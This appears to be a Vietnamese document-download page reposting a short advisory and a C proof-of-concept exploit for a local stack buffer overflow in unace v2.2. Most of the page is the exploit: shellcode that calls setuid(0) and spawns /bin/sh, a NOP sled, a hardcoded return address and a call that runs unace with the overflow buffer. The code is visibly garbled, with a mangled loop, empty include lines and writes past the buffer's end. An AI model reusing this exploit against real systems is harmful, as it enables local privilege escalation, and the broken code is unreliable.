Đang chuẩn bị liên kết để tải về tài liệu:
Unace Exploitable Buffer Overflow

Không đóng trình duyệt đến khi xuất hiện nút TẢI XUỐNG

An exploitable buffer overflow in unace has been found, the vulnereability will allow local attackers to cause the product to execute abitrary code. The following exploit code can be used to test the software for the vulnerability. | Unace Exploitable Buffer Overflow trang này đã được đọc lần An exploitable buffer overflow in unace has been found, the vulnereability will allow local attackers to cause the product to execute abitrary code. The following exploit code can be used to test the software for the vulnerability. CODE /* gEEk-unace.c * * PoC exploit made for advisory based uppon an local stack based overflow. * Vulnerable versions, maybe also prior versions: * * * Tested on: Debian 3.0 * * Advisory source: MegaHz * * ----------------------------------------- * coded by: demz (geekz.nl) (demz@geekz.nl) * ----------------------------------------- * */ #include #include char shellcode[]= "\x31\xc0" // xor eax, eax "\x31\xdb" // xor ebx, ebx "\x31\xc9" // xor ecx, ecx "\xb0\x46" // mov al, 70 "\xcd\x80" // int 0x80 "\x31\xc0" // xor eax, eax "\x50" // push eax "\x68\x6e\x2f\x73\x68" // push long 0x68732f6e "\x68\x2f\x2f\x62\x69" // push long 0x69622f2f "\x89\xe3" // mov ebx, esp "\x50" // push eax "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\x99" // cdq "\xb0\x0b" // mov al, 11 "\xcd\x80" // int 0x80 "\x31\xc0" // xor eax, eax "\xb0\x01" // mov al, 1 "\xcd\x80"; // int 0x80 int main() { unsigned long ret = 0xbfffc260; char buffer[707]; int i=0; memset(buffer, 0x90, sizeof(buffer)); for (0; i > 8; buffer[709] = (ret & 0x00ff0000) >> 16; buffer[710] = (ret & 0xff000000) >> 24; buffer[711] = 0x0; printf("\nUnace v2.2 local exploit\n"); printf("---------------------------------------- demz @ geekz.nl --\n"); execl("./unace", "unace", "e", buffer, NULL); }

Đã phát hiện trình chặn quảng cáo AdBlock
Trang web này phụ thuộc vào doanh thu từ số lần hiển thị quảng cáo để tồn tại. Vui lòng tắt trình chặn quảng cáo của bạn hoặc tạm dừng tính năng chặn quảng cáo cho trang web này.